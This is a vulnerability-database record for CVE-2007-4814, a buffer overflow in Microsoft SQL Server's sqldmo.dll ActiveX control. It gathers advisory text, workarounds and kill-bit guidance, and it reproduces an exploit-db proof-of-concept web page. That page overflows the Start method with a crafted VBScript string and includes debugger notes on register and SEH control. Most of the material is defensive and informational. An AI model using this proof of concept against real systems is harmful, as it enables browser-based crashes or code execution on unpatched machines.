ID CVE-2007-4814 Type cve Reporter NVD Modified 2018-10-15T17:38:15
Description
Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method.
{"osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Vulnerability Description\nA buffer overflow exists in the Distributed Management Objects OLE DLL (sqldmo.dll). The ActiveX control fails to provide proper bounds checking on arguments to the Start method resulting in a heap overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): \n\nUse a browser that does not support ActiveX controls.\n\nDisable ActiveX controls in IE\n## Short Description\nA buffer overflow exists in the Distributed Management Objects OLE DLL (sqldmo.dll). The ActiveX control fails to provide proper bounds checking on arguments to the Start method resulting in a heap overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nOther Advisory URL: http://retrogod.altervista.org/microsoft_sqldmo.html\nOther Advisory URL: http://securityreason.com/securityalert/3112\nISS X-Force ID: 36509\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4379\n[CVE-2007-4814](https://vulners.com/cve/CVE-2007-4814)\nBugtraq ID: 25594\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38399", "id": "OSVDB:38399", "title": "Microsoft SQL Server Enterprise Manager Distributed Management Objects OLE DLL ActiveX (sqldmo.dll) Start Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "id": "SAINT:61E475396C30E19A42CCA76357EBA661", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "type": "saint", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "id": "SAINT:98A0191E52B53F3C0CE52F6F1308C175", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:14", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "id": "SAINT:F28B5A24E1F8C3D543C46473D3D45AB8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:47:38", "bulletinFamily": "exploit", "description": "Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF. CVE-2007-4814. Dos exploit for windows platform", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "EDB-ID:4379", "href": "https://www.exploit-db.com/exploits/4379/", "type": "exploitdb", "title": "Microsoft SQL Server Distributed Management Objects sqldmo.dll BoF", "sourceData": "<!--\n18.48 01/09/2007\nMicrosoft SQL Server Distributed Management Objects OLE DLL for\nSQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc\n\nfile version: 2000.085.2004.00\nproduct version: 8.05.2004\n\npassing some fuzzy chars to Start method:\n\nEAX 00000000\nECX 00620062\nEDX 00620062\nEBX 1C3A3638 SQLDMO.1C3A3638\nESP 0013D87C\nEBP 0013DAA8\nESI 03042544\nEDI 0013DAA0 ASCII \"|T\"\nEIP 1C1C9800 SQLDMO.1C1C9800\n\n...\n1C1C97EA 8D8D E4FDFFFF LEA ECX,DWORD PTR SS:[EBP-21C]\n1C1C97F0 51 PUSH ECX\n1C1C97F1 8B95 E0FDFFFF MOV EDX,DWORD PTR SS:[EBP-220]\n1C1C97F7 8B02 MOV EAX,DWORD PTR DS:[EDX]\n1C1C97F9 8B8D E0FDFFFF MOV ECX,DWORD PTR SS:[EBP-220]\n1C1C97FF 51 PUSH ECX\n1C1C9800 FF90 DC010000 CALL DWORD PTR DS:[EAX+1DC] <--- exception\naccess violation when reading 000001DC\n\nby manipulating edx you have the first exploitable condition...\n\n\nalso seh is overwritten, then:\n\nEAX 00000000\nECX 00610061\nEDX 7C9137D8 ntdll.7C9137D8\nEBX 00000000\nESP 0013D4AC\nEBP 0013D4CC\nESI 00000000\nEDI 00000000\nEIP 00610061\n\nobject safety report:\nRegKey Safe for Script: False\nRegKey Safe for Init: False\nImplements IObjectSafety: True\n\nmeans: works according to security settings for the Internet zone\nneeds Activex \"not marked as safe\" option set to \"ask\" or \"enabled\" (not the predefined one)\n\nrgod.\nhttp://retrogod.altervista.org\n-->\n<html>\n<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>\n<script language='vbscript'>\n\ntargetFile = \"C:\\Programmi\\Microsoft SQL Server\\80\\Tools\\Binn\\sqldmo.dll\"\nprototype = \"Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )\"\nmemberName = \"Start\"\nprogid = \"SQLDMO.SQLServer\"\nargCount = 4\n\n'edx = ecx\nedx =\"bb\"\nseh =\"aa\"\nStartMode =True\nServer =\"http://ZZZZ\\YYYY\\XXXX\\WW?W\\VVVV\\AAAA\\AAA\\AAAAA\\AAAA\\AA@AA\\tes\\test\\test\\tes.\\ttest\\MMMM\\LLLL\\KKK\\JJJJ\\IIII\\HH.H\\GGGGG\\FFFF\\EEEE\\DDD\\CCCC\\BBBB\\AAA\\A\\\\\\\\\\\\\\\\\\:#$%AAAA\\BBBB\\CCCC\\DD?D\\EEEE\\FFFF\\GGG\\\\:#$%\\HHHHH\\IIII\\te@st\\tes\\test\\test\\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa\" + seh + \"CCDmmm\" + edx + \"nnnBBBB\\AAAA\\ZZZ\\Z\\\\\\\\\\\\\\\\\\:#$%YYYY\\XXXX\\WWWW\\VV?V\\UUUU\\TTTT\\SSS\\\\:#$%\\RRRRR\\QQQQ\\PP@PP\\OOO\\NNNN\\MMMM\\LLL.\\KKKKK\\JJJJ\\IIII\\HHH\\GGGG\\FFFF\\EE.E\\DDDDD\\CCCC\\BBBB\\AAA\\AAAA\\AAAA\\AAA\\A\\\\\\\\\\\\\\\\\\:#$%AAAA\\AAAA\\AAAA\\AA?A\\wwww\\vvvv\\uuu\\\\:#$%\\ttttt\\ssss\\rr@rr\\qqq\\pppp\\oooo\\nnn.\\mmmmm\\llll\\kkkk\\jjj\\iiii\\hhhh\\gg.g\\fffff\\eeee\\dddd\\ccc\\bbbb\\aaaa\\AAA\\A\\\\\\\\\\\\\\\"\nLogin =\"aaaaaaaa\"\nPassword =\"bbbbbbbb\"\n\nSQLServer.Start StartMode ,Server ,Login ,Password\n\n</script>\n</html>\n\n# milw0rm.com [2007-09-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4379/"}]}